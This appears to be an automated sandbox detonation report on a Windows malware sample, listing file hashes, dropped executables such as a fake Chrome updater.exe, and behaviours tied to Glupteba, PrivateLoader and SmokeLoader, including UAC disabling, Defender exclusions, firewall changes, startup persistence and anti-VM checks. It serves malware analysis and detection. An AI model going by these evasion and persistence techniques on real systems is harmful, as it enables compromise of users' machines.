SHA1 aeb530644d1ec485e6299ad2d2eff7d967d08526
SHA256 d69de755f56d7a5d6bbb2f2e3de54af151321566c3ecf860bd456d1b2ac96d76
SHA512 9e171d0297f915aa0c7df57c855540afc1b8123cfa8eec8152ad62655bc5b81ecb170a3eb35ce366f0073731717cbe38a733cb471853bc0e4563351a071e2e09

memory/2660-424-0x000000013F810000-0x000000013FDB1000-memory.dmp

memory/2764-425-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/2764-427-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-430-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-432-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2764-440-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2764-439-0x0000000002500000-0x0000000002580000-memory.dmp

memory/1868-431-0x0000000000400000-0x0000000000639000-memory.dmp

memory/2764-451-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-426-0x00000000021F0000-0x00000000021F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NHNN7G0A1QIALH6JSOQK.temp

MD5 81bfb6712c482635b537696c85a5e0a2
SHA1 6adfd132e631b0aae06cdc47567226f7f1c7b4e2
SHA256 b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c
SHA512 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 81bfb6712c482635b537696c85a5e0a2
SHA1 6adfd132e631b0aae06cdc47567226f7f1c7b4e2
SHA256 b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c
SHA512 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5

memory/2736-514-0x0000000001120000-0x0000000001649000-memory.dmp

memory/2660-527-0x000000013F810000-0x000000013FDB1000-memory.dmp

memory/1612-528-0x00000000026A0000-0x0000000002A98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1868-530-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1524-578-0x0000000002840000-0x0000000002C38000-memory.dmp

memory/1868-589-0x0000000000400000-0x0000000000639000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 5c2be31ca24cfcf4a2c0170a04b370c2
SHA1 f914b9fae082aa2a557bfa41128195b15d2a9ea4
SHA256 3aed316b26acbbf1dbc4c2c6367b6559dd1f49b8c125c3bbd37f7084d5a9a4f0
SHA512 de69c53a55f507cfd8383103d889b4fa0df03fb253a6493cf2e5887f5fb609bf1ee04eae73560bfe91605cd163fd8d49e74d4e982794bf6fcf33e3887620532d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-21 22:51

Reported

2023-11-21 22:55

Platform

win10v2004-20231020-en

Max time kernel

64s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4776 created 3192 N/A C:\Windows\System32\cmd.exe C:\Windows\Explorer.EXE
PID 4776 created 3192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Explorer.EXE

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\System32\Conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Windows\System32\Conhost.exe N/A

Detected executables Discord URL observed in first stage droppers

discordurls
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\allnewumm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1JzKRfgB0B6mlpDNhxRTMYH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KeKNI0HBC3jTbaXu7F5P7HsG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CSV14BpysP5J7MQG4zJUEk8j.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qY671kJQ7AzPIoEelwuZgy8N.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LBxBdM1YkSZDVFCIrKdVFUoV.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIvrl8AYVkg08cvMP7IdS09k.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H9PWKUBrzog8hpkvdpqSJkYl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 4624 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4624 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
PID 4444 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
